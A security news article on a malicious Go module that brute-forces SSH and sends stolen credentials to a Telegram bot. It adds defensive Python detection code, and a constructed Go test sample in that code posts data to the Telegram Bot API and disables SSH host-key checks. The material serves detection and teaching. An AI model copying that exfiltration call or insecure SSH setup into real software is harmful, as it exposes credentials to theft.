Cybersecurity researchers have recently uncovered a malicious Go module that disguises itself as an SSH brute-force tool, but its true function is to covertly exfiltrate user credentials. This module, known as "golang-random-ip-ssh-bruteforce," transmits sensitive information, such as the target’s IP address, username, and password, to a Telegram bot controlled by the threat actor after a successful login.
Published on June 24, 2022, the package was associated with a now-inaccessible GitHub account named IllDieAnyway, yet it remains available on pkg.go.dev. The malware scans random IPv4 addresses for open SSH services on TCP port 22 and uses an embedded list of weak usernames and passwords to launch brute-force attacks.
A significant feature of the malware is that it disables host key verification, allowing the SSH client to connect to any server without confirming its identity. The password list primarily includes common usernames like "root" and "admin" paired with easily guessable passwords such as "password," "12345678," and "qwerty."
The malicious code runs indefinitely, attempting multiple SSH logins concurrently with the provided username-password pairs. After successfully obtaining credentials, the information is sent to a Telegram bot called "@sshZXC_bot" via the Telegram Bot API, which verifies the receipt of the data. Additionally, the account receiving the information has the handle "@io_ping."
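The two traits the report describes, host key verification switched off and results posted to the Telegram Bot API, are both visible in source, so a dependency review can look for them before a module is built. The following is an added example written for this article, not the researchers' tooling or code from the module itself. It assumes the module uses golang.org/x/crypto/ssh, where host key checking is disabled by setting HostKeyCallback to ssh.InsecureIgnoreHostKey(), and that the Telegram Bot API is reached under https://api.telegram.org/bot<token>/. The Go snippets it scans are constructed for the demonstration.

```python
"""Audit Go source for the traits the reported module exhibits.

Added example: SSH host key verification disabled, an exfiltration
endpoint on the Telegram Bot API, and an embedded weak-credential list.
The Go fragments below are constructed test input, not the module's code.
"""
import re
from dataclasses import dataclass
from typing import List

# Assumption: x/crypto/ssh disables host key checks via ssh.InsecureIgnoreHostKey(),
# and the Telegram Bot API lives under api.telegram.org/bot<token>/.
PATTERNS = {
    "ssh-hostkey-check-disabled": re.compile(r"\bssh\.InsecureIgnoreHostKey\s*\("),
    "telegram-bot-api-endpoint": re.compile(r"api\.telegram\.org/bot"),
    "embedded-weak-credentials": re.compile(r'"(password|12345678|qwerty)"'),
}


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int
    text: str


def audit_go_source(source: str) -> List[Finding]:
    """Return one Finding per (rule, line) hit; comment-only lines are skipped."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("//"):
            continue  # a comment cannot disable verification or make a request
        for rule, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append(Finding(rule, lineno, stripped))
    return findings


def is_suspicious(findings: List[Finding]) -> bool:
    """The pairing matters: unverified SSH plus a Bot API endpoint in one module."""
    rules = {f.rule for f in findings}
    return {"ssh-hostkey-check-disabled", "telegram-bot-api-endpoint"} <= rules


# Constructed sample resembling the reported traits (not the real module).
SUSPICIOUS_GO = '''package main

import (
	"net/http"
	"golang.org/x/crypto/ssh"
)

var users = []string{"root", "admin"}
var passwords = []string{"password", "12345678", "qwerty"}

func report(token, chat, text string) {
	http.Get("https://api.telegram.org/bot" + token + "/sendMessage?chat_id=" + chat + "&text=" + text)
}

func config() *ssh.ClientConfig {
	return &ssh.ClientConfig{
		User:            users[0],
		Auth:            []ssh.AuthMethod{ssh.Password(passwords[0])},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
	}
}
'''

# Constructed clean sample: host keys are checked against known_hosts.
CLEAN_GO = '''package main

import (
	"golang.org/x/crypto/ssh"
	"golang.org/x/crypto/ssh/knownhosts"
)

func config(user string, auth ssh.AuthMethod) (*ssh.ClientConfig, error) {
	cb, err := knownhosts.New("/etc/ssh/ssh_known_hosts")
	if err != nil {
		return nil, err
	}
	return &ssh.ClientConfig{User: user, Auth: []ssh.AuthMethod{auth}, HostKeyCallback: cb}, nil
}
'''

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_GO), ("clean", CLEAN_GO)):
        hits = audit_go_source(src)
        print(name, "suspicious" if is_suspicious(hits) else "ok")
        for h in hits:
            print(f"  {h.rule} (line {h.line}): {h.text}")
```

The weak-credential rule on its own is only a hint, since legitimate test fixtures contain such strings; the verdict is driven by the pairing of an SSH client that accepts any host key with an outbound Bot API call, which is the behaviour the report describes.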
Archived snapshots reveal that IllDieAnyway’s software portfolio previously included various tools such as an IP port scanner and an Instagram media parser, showcasing a pattern of malicious software development. The threat actor is suspected to have Russian origins, contributing to a broader concern about pervasive cyber threats.
According to the researchers, the behavior of this module spreads risk to unwitting operators while consolidating successful attacks through a single control point. By using HTTPS for communication with the Telegram bot, the malware can evade detection by traditional security controls, making it a particularly insidious threat.
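Because the Telegram traffic is HTTPS, content inspection sees nothing useful; what remains observable on the operator's host is the destination and the pattern of connections. The following is an added example for this article, not the researchers' detection logic. It assumes per-process outbound connection events carrying the TLS SNI (as an EDR or egress proxy would record), treats api.telegram.org as the Bot API host, and uses a tunable fan-out threshold; the event log is constructed for the demonstration.

```python
"""Flag a process that shows both behaviours the report attributes to the
module: SSH connections fanned out to many distinct IPv4 addresses on
port 22, and HTTPS egress to the Telegram Bot API host.

Added example with constructed connection events; thresholds are assumptions.
"""
from collections import defaultdict
from typing import Dict, List

TELEGRAM_API_HOST = "api.telegram.org"  # assumption: Bot API endpoint host
SSH_FANOUT_THRESHOLD = 20               # assumption: tune per environment


def analyse(events: List[Dict]) -> List[Dict]:
    """Return one alert per (host, process) meeting both conditions."""
    ssh_targets = defaultdict(set)       # (host, process) -> distinct port-22 destinations
    telegram_egress = defaultdict(int)   # (host, process) -> TLS connections to the Bot API
    for e in events:
        key = (e["host"], e["process"])
        if e["dst_port"] == 22:
            ssh_targets[key].add(e["dst_ip"])
        elif e["dst_port"] == 443 and e.get("sni") == TELEGRAM_API_HOST:
            telegram_egress[key] += 1

    alerts = []
    for key, targets in ssh_targets.items():
        if len(targets) >= SSH_FANOUT_THRESHOLD and telegram_egress[key] > 0:
            alerts.append({
                "host": key[0],
                "process": key[1],
                "ssh_targets": len(targets),
                "telegram_posts": telegram_egress[key],
                "reason": "ssh fan-out combined with Telegram Bot API egress",
            })
    return sorted(alerts, key=lambda a: (a["host"], a["process"]))


def constructed_events() -> List[Dict]:
    """Build a small synthetic log (TEST-NET addresses, fictitious hosts)."""
    ev = []
    # build-01: a process sweeping 25 addresses on port 22, then posting to the Bot API.
    for i in range(1, 26):
        ev.append({"host": "build-01", "process": "sshtool", "dst_ip": f"203.0.113.{i}",
                   "dst_port": 22, "sni": None})
    for _ in range(2):
        ev.append({"host": "build-01", "process": "sshtool", "dst_ip": "198.51.100.9",
                   "dst_port": 443, "sni": TELEGRAM_API_HOST})
    # ci-02: repeated SSH to a single git server is normal fan-out.
    for _ in range(30):
        ev.append({"host": "ci-02", "process": "git", "dst_ip": "192.0.2.10",
                   "dst_port": 22, "sni": None})
    # ops-03: a legitimate notifier talks to Telegram but never scans SSH.
    ev.append({"host": "ops-03", "process": "alertd", "dst_ip": "198.51.100.9",
               "dst_port": 443, "sni": TELEGRAM_API_HOST})
    return ev


if __name__ == "__main__":
    for alert in analyse(constructed_events()):
        print(alert)
```

Requiring both signals keeps the rule quiet on CI hosts that legitimately open many SSH sessions to one server, and on systems that use Telegram for alerting; a plain destination block on api.telegram.org at the egress proxy remains the simpler control where no business use exists.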